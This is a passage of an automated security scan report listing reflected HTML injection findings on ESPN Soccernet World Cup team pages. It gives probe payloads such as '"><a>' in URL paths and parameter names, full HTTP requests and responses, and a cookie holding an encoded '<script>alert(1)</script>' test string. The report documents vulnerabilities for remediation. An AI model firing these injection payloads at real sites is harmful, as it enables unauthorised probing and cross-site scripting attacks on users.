<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Japan Football / So ...[SNIP]... <a href="/worldcup2010/team?team=627&7f5b1"><a>ddd77a815e5=1&_slug_=japan&7f5b1"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c26"><a>970c5e66c8e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia91c26"><a>970c5e66c8e HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN07
Cache-Expires: Sat, 06 Nov 2010 23:13:55 GMT
Content-Length: 82012
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Australia Football ...[SNIP]... <a href="/worldcup2010/team?team=628&_slug_=australia91c26"><a>970c5e66c8e&topId=792986&linktext=Striker+hits+out+over+coach%27s+tactics"> ...[SNIP]...
2.104. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/628/australia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f41f3"><a>62eb963c13c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia?f41f3"><a>62eb963c13c=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:31 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:12:31 GMT Content-Length: 82120 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Australia Football ...[SNIP]... <a href="/worldcup2010/team?team=628&f41f3"><a>62eb963c13c=1&_slug_=australia&f41f3"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1812"><a>6cd9474c3cf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroond1812"><a>6cd9474c3cf HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:15 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:15 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Cache-Expires: Sat, 06 Nov 2010 23:13:15 GMT Content-Length: 81962 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cameroon Football / ...[SNIP]... <a href="/worldcup2010/team?team=656&_slug_=cameroond1812"><a>6cd9474c3cf&topId=801800&linktext=Cameroon+coach+Le+Guen+quits+after+loss"> ...[SNIP]...
2.106. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/656/cameroon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c3a"><a>f85413ba34c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroon?74c3a"><a>f85413ba34c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:27 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:27 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Cache-Expires: Sat, 06 Nov 2010 23:12:27 GMT Content-Length: 82070 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cameroon Football / ...[SNIP]... <a href="/worldcup2010/team?team=656&74c3a"><a>f85413ba34c=1&_slug_=cameroon&74c3a"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf86"><a>41113cade21 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/657/nigeria2cf86"><a>41113cade21 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:33 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Cache-Expires: Sat, 06 Nov 2010 23:33:33 GMT Content-Length: 81727 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nigeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=657&_slug_=nigeria2cf86"><a>41113cade21&topId=792890&linktext=Nigerian+goverment+won%27t+ban+team"> ...[SNIP]...
2.108. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/657/nigeria
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac97"><a>0764b8f72c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/657/nigeria?8ac97"><a>0764b8f72c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:25:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:25:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Cache-Expires: Sat, 06 Nov 2010 23:30:13 GMT Content-Length: 81827 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nigeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=657&8ac97"><a>0764b8f72c=1&_slug_=nigeria&8ac97"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac12"><a>f4a7d4b1647 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-statesbac12"><a>f4a7d4b1647 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:34:25 GMT Content-Length: 82134 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>United States Footb ...[SNIP]... <a href="/worldcup2010/team?team=660&_slug_=united-statesbac12"><a>f4a7d4b1647&topId=802760&linktext=Ghana+advance+after+beating+USA+2-1"> ...[SNIP]...
2.110. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/660/united-states
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e57e"><a>f7a6114e7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-states?3e57e"><a>f7a6114e7ef=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
